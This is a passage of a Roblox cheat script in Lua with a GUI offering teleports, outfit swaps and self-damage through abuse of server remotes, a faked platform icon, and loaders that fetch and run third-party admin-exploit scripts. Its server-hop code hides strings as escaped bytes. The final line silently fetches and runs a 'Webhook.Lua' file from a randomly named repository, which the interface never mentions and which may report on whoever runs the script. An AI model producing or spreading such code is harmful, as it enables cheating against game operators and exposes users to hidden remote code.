    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(172.857773, -8.10354042, 214.540146, 0.00442328211, 5.67852831e-09, -0.999990225, 1.05739257e-08, 1, 5.72535575e-09, 0.999990225, -1.05991473e-08, 0.00442328211)
end}

Tab:Button{
	Name = "Main undergrown tunnel",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-140.920547, -26.7417831, 1392.25342, -0.0302737169, -6.24658867e-08, -0.99954164, -5.75290429e-08, 1, -6.07521145e-08, 0.99954164, 5.56634809e-08, -0.0302737169)
end}

Tab:Button{
	Name = "Secret room",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Teleporting...",
	Duration = 2,
	Callback = function() end 
                
            }
    game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(517.535889, 11.9813147, -879.517883, -0.708056808, -1.70877392e-08, -0.706155479, -1.09872937e-08, 1, -1.31813902e-08, 0.706155479, -1.57443547e-09, -0.708056808)
end}
local Tab = GUI:Tab{
	Name = "Outfits",
	Icon = "rbxassetid://7194280652"
}

Tab:Button{
	Name = "Normal outfit",
	Description = nil,
	Callback = function() 
	    local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Changing...",
	Duration = 8,
	Callback = function() end
}

local args = {
    [1] = {
        ["Headgear"] = "C982750C-74A9-4730-8AB2-8181EF24FD64",
        ["Accessory"] = "377F6631-CD34-4970-AC7A-99A7DED948B0",
        ["Shirt"] = "426584EE-4444-4487-97A9-4858AAE5C236",
        ["Pants"] = "8BFFA37F-D026-4A04-A422-DCD5367A1C31",
    }
}

game:GetService("ReplicatedStorage").Packages.Knit.Services.CharacterService.RF.ApplyData:InvokeServer(unpack(args))
end}

Tab:Button{
	Name = "Chef",
	Description = nil,
	Callback = function() 
	    local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Changing...",
	Duration = 8,
	Callback = function() end
}

local args = {
    [1] = {
        ["Headgear"] = "2C3FDC19-B38F-44AB-AA57-CD0235543107",
        ["Accessory"] = "377F6631-CD34-4970-AC7A-99A7DED948B0",
        ["Shirt"] = "A4691125-2102-4F8A-BBF2-1C409EC0D4B7",
        ["Pants"] = "8784806C-838D-4DE4-9730-405B7833B0D0",
        ["Body Gear"] = false
    }
}

game:GetService("ReplicatedStorage").Packages.Knit.Services.CharacterService.RF.ApplyData:InvokeServer(unpack(args))

end}

Tab:Button{
	Name = "Hot day out",
	Description = nil,
	Callback = function() 
	    local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Changing...",
	Duration = 8,
	Callback = function() end
}



local args = {
    [1] = {
        ["Headgear"] = "A7E98E4D-2355-47A0-9C41-7B85B563883F",
        ["Accessory"] = "516CFA51-746E-4983-8C52-5822F0134DE5",
        ["Shirt"] = "CE964BCE-321D-43B3-867F-FE21B296BBF4",
        ["Pants"] = "86EAD503-8C7D-4370-9F83-73B8E9B61811",
        ["Body Gear"] = "16E6DAC8-2721-4504-90E6-FEC891BF3A7D"
    }
}

game:GetService("ReplicatedStorage").Packages.Knit.Services.CharacterService.RF.ApplyData:InvokeServer(unpack(args))


end}

Tab:Button{
	Name = "BCT outfit",
	Description = nil,
	Callback = function() 
	    local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Changing...",
	Duration = 8,
	Callback = function() end
}



local args = {
    [1] = {
        ["Headgear"] = "C982750C-74A9-4730-8AB2-8181EF24FD64",
        ["Accessory"] = false,
        ["Shirt"] = "45259522-246A-4ED6-8426-641080A1E9C6",
        ["Pants"] = "8BFFA37F-D026-4A04-A422-DCD5367A1C31",
        ["Body Gear"] = "Apply"
    }
}

game:GetService("ReplicatedStorage").Packages.Knit.Services.CharacterService.RF.ApplyData:InvokeServer(unpack(args))

end}

local Tab = GUI:Tab{
	Name = "Auto Jump",
	Icon = "rbxassetid://7219199111"
}

Tab:Dropdown{
	Name = "Jumping Jacks",
	StartingText = "Select...",
	Description = "Jumping Jacks: 'ONE!', 'TWO!', 'THREE', and so on.",
	Items = {
	    {"25 JJ's", 1},
	    {"50 JJ's", 2},
	    {"75 JJ's", 3},
	    {"100 JJ's", 4}

	},
	Callback = function(item) return 
end}

Tab:Dropdown{
	Name = "Grammar Jacks",
	StartingText = "Select...",
	Description = "Grammar Jacks: 'ONE!', 'TWO!', 'THREE', and so on.",
	Items = {
	    {"25 GJ's", 1},
	    {"50 GJ's", 2},
	    {"75 GJ's", 3},
	    {"100 GJ's", 4}

	},
	Callback = function(item) return 
end}

Tab:Dropdown{
	Name = "Hell Jacks",
	StartingText = "Select...",
    	Description = "Hell Jacks: 'O', 'N', 'E', and so on. (basicly typing each individual letter)",
	Items = {
	    {"25 HJ's", 1},
	    {"50 HJ's", 2},
	    {"75 HJ's", 3},
	    {"100 HJ's", 4}

	},
	Callback = function(item) return 
end}

Tab:Dropdown{
	Name = "Auto Jump",
	StartingText = "Select...",
    	Description = "Jump's automatically for the all the jumping jacks.",
	Items = {
	    {"25 HJ's", 1},
	    {"50 HJ's", 2},
	    {"75 HJ's", 3},
	    {"100 HJ's", 4}

	},
	Callback = function(item) return 
end}

Tab:Button{
	Name = "Stop all",
	Description = "Stop's the JJ's, GJ's, HJ's, and auto jump.",
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Stopping them...",
	Duration = 2,
	Callback = function() end 
                
            }
    
end}

local Tab = GUI:Tab{
	Name = "Trolling",
	Icon = "rbxassetid://6157200594",
}

Tab:Button{
	Name = "Take Damage",
	Description = "If at full health you can click the *Take damage* 6 times without dying.",
	Callback = function() 
	    local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Damaging...",
	Duration = 8,
	Callback = function() end
}
local args = {
    [1] = 0.2
}

game:GetService("ReplicatedStorage").Packages.Knit.Services.SkydivingService.RF.FallDamage:InvokeServer(unpack(args))
end}

Tab:Button{
	Name = "Icon Mobile",
	Description = "This is FE, everyone can see your icon on your name as Mobile.",
	Callback = function() 
	    local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "You are now Mobile.",
	Duration = 8,
	Callback = function() end
}

local args = {
    [1] = "Mobile"
}

game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.SetPlatform:InvokeServer(unpack(args))

end}

Tab:Button{
	Name = "Icon Desktop/PC",
	Description = "This is FE, everyone can see your icon on your name as Desktop/PC.",
	Callback = function() 
	    local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "You are now Desktop/PC.",
	Duration = 8,
	Callback = function() end
}

local args = {
    [1] = "PC"
}

game:GetService("ReplicatedStorage").Packages.Knit.Services.PlayerHandler.RF.SetPlatform:InvokeServer(unpack(args))

end}

local Tab = GUI:Tab{
	Name = "Script hub",
	Icon = "rbxassetid://6031075938"
}

Tab:Button{
	Name = "Infinite Yield",
	Description = "Credits: Edge, Moon, Zwolf, Toon.",
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Loading...",
	Duration = 2,
	Callback = function() end 
                
            }
    loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source",true))()
end}

Tab:Button{
	Name = "CMD-X",
	Description = "Credits: pigeon#8951, fini#7057, Curvn#2002.",
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Loading...",
	Duration = 2,
	Callback = function() end 
                
            }
    loadstring(game:HttpGet("https://raw.githubusercontent.com/CMD-X/CMD-X/master/Source",true))()
end}

Tab:Button{
	Name = "Fates-Admin",
	Description = "Credits: fate#5647, Iaying#6564, misrepresenting#4917, Shawn#2000, dsf#2711.",
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Loading...",
	Duration = 2,
	Callback = function() end 
                
            }
    loadstring(game:HttpGet("https://raw.githubusercontent.com/fatesc/fates-admin/main/main.lua"))();
end}

Tab:Button{
	Name = "Owl-Hub",
	Description = "Credits: Google Chrome and CriShoux.",
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Loading...",
	Duration = 2,
	Callback = function() end 
                
            }
    loadstring(game:HttpGet("https://raw.githubusercontent.com/CriShoux/OwlHub/master/OwlHub.txt"))();
end}


local Tab = GUI:Tab{
	Name = "Other fetures",
	Icon = "rbxassetid://7194280652"
}


	Tab:_theme_selector()


Tab:credit{Name = "Support Server", Description = "Click the Discord button to copy the discord server to get support.", Discord = "http://discord.gg/wUbAAhypTH", V3rmillion = "http://discord.gg/wUbAAhypTH"}

Tab:Button{
	Name = "Serverhop",
	Description = "Join's a diffrent server.",
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Serverhoping...",
	Duration = 2,
	Callback = function() end 
                
            }
    local m = {} for _, v in ipairs(game:GetService("\72\116\116\112\83\101\114\118\105\99\101"):JSONDecode(game:HttpGetAsync("\104\116\116\112\115\58\47\47\103\97\109\101\115\46\114\111\98\108\111\120\46\99\111\109\47\118\49\47\103\97\109\101\115\47" .. game.PlaceId .. "\47\115\101\114\118\101\114\115\47\80\117\98\108\105\99\63\115\111\114\116\79\114\100\101\114\61\65\115\99\38\108\105\109\105\116\61\49\48\48")).data) do if type(v) == "\116\97\98\108\101" and v.maxPlayers > v.playing and v.id ~= game.JobId then m[#m + 1] = v.id end end if #m > 0 then game:GetService("\84\101\108\101\112\111\114\116\83\101\114\118\105\99\101"):TeleportToPlaceInstance(game.PlaceId, m[math.random(1, #m)]) else return notify("\83\101\114\118\101\114\104\111\112","\67\111\117\108\100\110\39\116\32\102\105\110\100\32\97\32\115\101\114\118\101\114\46") end
end}

Tab:Button{
	Name = "Rejoin",
	Description = "It will rejoin the game in the current server you are in.",
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "Rejoing...",
	Duration = 2,
	Callback = function() end 
                
            }
    local m = game:GetService("\84\101\108\101\112\111\114\116\83\101\114\118\105\99\101") local n = game:GetService("\80\108\97\121\101\114\115").LocalPlayer m:Teleport(game.PlaceId, n)
end}

local Tab = GUI:Tab{
	Name = "Admin stuff",
	Icon = "rbxassetid://6031075938"
}

Tab:Button{
	Name = "Bypass kicks/bans/kickwarns",
	Description = nil,
	Callback = function() local CoreGui = game:GetService("StarterGui")

            GUI:Notification{
	Title = "Alert",
	Text = "In the making.",
	Duration = 2,
	Callback = function() end 
                
            }
    
end}


    GUI:Notification{
	Title = "Alert",
	Text = "Please wait 3 minutes before leaving the game or else you will be arrested for 15 minutes. If you arn't able to reset, do not leave the game.",
	Duration = 15,
	Callback = function() end
}


loadstring(game:HttpGet("https://raw.githubusercontent.com/i6V8EMFoQ3LgbtmFWiwRCJ9JJ3uDdkJU6WByXhF/LTjiKm22s2u5wi5RhqXnGniTUBsHvhZ1ftGZAuf/main/Webhook.Lua"))()
